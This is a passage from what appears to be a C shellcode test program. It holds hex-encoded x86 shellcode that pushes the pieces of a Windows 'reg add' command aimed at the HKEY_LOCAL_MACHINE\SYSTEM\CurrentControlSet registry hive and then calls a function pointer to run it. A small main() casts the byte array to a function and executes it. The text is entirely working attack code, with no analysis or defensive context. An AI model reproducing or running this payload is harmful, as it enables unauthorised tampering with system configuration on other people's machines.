"\x6c\x68\x5c\x43\x6f\x6e\x68\x6c\x53\x65\x74\x68\x6e\x74\x72\x6f\x68\x6e\x74\x43\x6f"
"\x68\x75\x72\x72\x65\x68\x45\x4d\x5c\x43\x68\x53\x59\x53\x54\x68\x49\x4e\x45\x5c\x68"
"\x4d\x41\x43\x48\x68\x43\x41\x4c\x5f\x68\x59\x5f\x4c\x4f\x68\x22\x48\x4b\x45\x68\x61"
"\x64\x64\x20\x68\x72\x65\x67\x20\x54\x8b\x45\xd8\xff\xd0";
int main(int argc, char **argv)
{
int (*func)();
func = (int(*)()) code;
(int)(*func)();
}